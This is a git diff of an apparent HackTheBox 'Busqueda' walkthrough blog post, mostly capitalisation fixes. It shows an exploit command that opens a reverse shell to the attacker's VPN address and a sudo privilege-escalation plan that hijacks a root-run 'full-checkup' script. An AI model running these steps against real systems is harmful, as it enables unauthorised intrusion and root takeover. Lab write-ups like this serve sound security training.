will-analyze/will-analyze.github.io/_posts/2024-11-09-HackTheBox_Busqueda_Walkthrough.md

 **heads up: you may need root permissions to open up a port, in which case just put a "sudo" at the beginning**

-now just run this command and we should be ready to go:
+Now just run this command and we should be ready to go:

 ``` bash
 python3 exploit.py [INSERT_LOCAL_VPN_IP_HERE] 8080 [INSERT_TARGET_URL_HERE]
 ```
-looks like we now have revshell as a user named svc:
+Looks like we now have revshell as a user named svc:

 ![](/assets/img/htb_busqueda/Screenshot_From_2024-10-28_21-34-58.png)

 ### Command and Control

-it seems as though we already have a normal user, and if we navigate to the home directory we should see user.txt which contains our user flag.
+It seems as though we already have a normal user, and if we navigate to the home directory we should see user.txt which contains our user flag.

 I recommend a break here as we just did quite a bit.

-now let's see if we can get root.
+Now let's see if we can get root.

 ### Privilege escalation

-here we can upload linpeas or something of that nature.
+Here we can upload linpeas or something of that nature.
 While that would work, I want to try and get low hanging fruit with a simple "sudo -l"

 ![](/assets/img/htb_busqueda/Screenshot_From_2024-11-05_21-15-11.png)

-looks like there is a python script that the user can execute as root, but not read or write.
+Looks like there is a python script that the user can execute as root, but not read or write.

 ![](/assets/img/htb_busqueda/Screenshot_From_2024-11-05_21-26-36.png)

-executing it, we get a couple options, but I chose to go with the "full-checkup" in order to get a larger picture as to what the script does.
+Executing it, we get a couple options, but I chose to go with the "full-checkup" in order to get a larger picture as to what the script does.

 It looks like there is an instance of gitea on the server, I am going to add "gitea.searcher.htb" to the etc/hosts and navigate to the site:

 ![](/assets/img/htb_busqueda/Screenshot_From_2024-11-09_22-29-23.png)

-going through the site, this mainly looks like a git service that is used to maintain the site.
+Going through the site, this mainly looks like a git service that is used to maintain the site.

 I also see that the version is Gitea Version: 1.18.0+rc1, let's see if there are any associated CVEs:

 ![](/assets/img/htb_busqueda/Screenshot_From_2024-11-09_22-30-48.png)

-while there are CVEs associated with Gitea, there aren't any associated with this current version.
+While there are CVEs associated with Gitea, there aren't any associated with this current version.
 Looks like we are going to have to get creative:

 ![](/assets/img/htb_busqueda/Screenshot_From_2024-11-09_22-53-02.png)

 I do notice that full-checkup appears to be a bash file that get executed *with sudo privileges!* by the python script.
 While we can't edit this file, we could potentially make our own that will give us a reverse shell running as root.

-this is a really handy resource for making reverse shells in various languages:
+This is a really handy resource for making reverse shells in various languages:

 https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet